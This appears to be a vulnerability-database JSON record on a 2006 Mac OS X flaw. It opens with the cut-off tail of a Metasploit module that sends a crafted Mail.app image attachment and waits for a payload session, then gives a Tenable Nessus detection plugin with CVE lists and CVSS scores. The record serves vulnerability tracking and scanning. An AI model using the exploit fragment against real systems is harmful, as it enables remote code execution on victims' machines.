\"image/jpeg;\\r\\n x-mac-type=0;\\r\\n x-unix-mode=0755;\\r\\n x-mac-creator=0;\\r\\n name=\\\"#{name}\\\"\", \"base64\\r\\nContent-Id: #{cid}\", \"inline;\\r\\n filename=#{name}\" )\n\n msg.parts << dbl\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/email/mailapp_image_exec.rb"}], "nessus": [{"lastseen": "2018-09-02T00:01:29", "references": ["http://docs.info.apple.com/article.html?artnum=303382"], "pluginID": "20990", "description": "The remote host is running Apple Mac OS X, but lacks Security Update 2006-001.\n\nThis security update contains fixes for the following applications :\n\napache_mod_php automount Bom Directory Services iChat IPSec LaunchServices LibSystem loginwindow Mail rsync Safari Syndication", "edition": 5, "reporter": "Tenable", "published": "2006-03-02T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2006-001)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2006-0387", "CVE-2005-3392", "CVE-2006-0383", "CVE-2006-0388", "CVE-2006-0395", "CVE-2005-2713", "CVE-2005-4504", "CVE-2006-0386", "CVE-2005-3319", "CVE-2006-0384", "CVE-2006-0389", "CVE-2005-3391", "CVE-2005-2714", "CVE-2005-3712", "CVE-2006-0848", "CVE-2005-3706", "CVE-2006-0391", "CVE-2005-4217"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2006-001.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20990", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20990);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2005-2713\", \"CVE-2005-2714\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3391\",\n \"CVE-2005-3392\", \"CVE-2005-3706\", \"CVE-2005-3712\", \"CVE-2005-4217\", \"CVE-2005-4504\",\n \"CVE-2006-0383\", \"CVE-2006-0384\", \"CVE-2006-0386\", \"CVE-2006-0387\", \"CVE-2006-0388\",\n \"CVE-2006-0389\", \"CVE-2006-0391\", \"CVE-2006-0395\", \"CVE-2006-0848\");\n script_bugtraq_id(16736, 16907);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2006-001)\");\n script_summary(english:\"Check for Security Update 2006-001\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote operating system is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Apple Mac OS X, but lacks\nSecurity Update 2006-001.\n\nThis security update contains fixes for the following\napplications :\n\napache_mod_php\nautomount\nBom\nDirectory Services\niChat\nIPSec\nLaunchServices\nLibSystem\nloginwindow\nMail\nrsync\nSafari\nSyndication\");\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=303382\");\n script_set_attribute(attribute:\"solution\", value:\n\"Mac OS X 10.4 :\nhttp://www.apple.com/support/downloads/securityupdate2006001macosx1045ppc.html\nhttp://www.apple.com/support/downloads/securityupdate2006001macosx1045intel.html\n\nMac OS X 10.3 :\nhttp://www.apple.com/support/downloads/securityupdate20060011039client.html\nhttp://www.apple.com/support/downloads/securityupdate20060011039server.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Archive Metadata Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-5]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2006-00[123467]|2007-003)\", string:packages)) security_hole(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
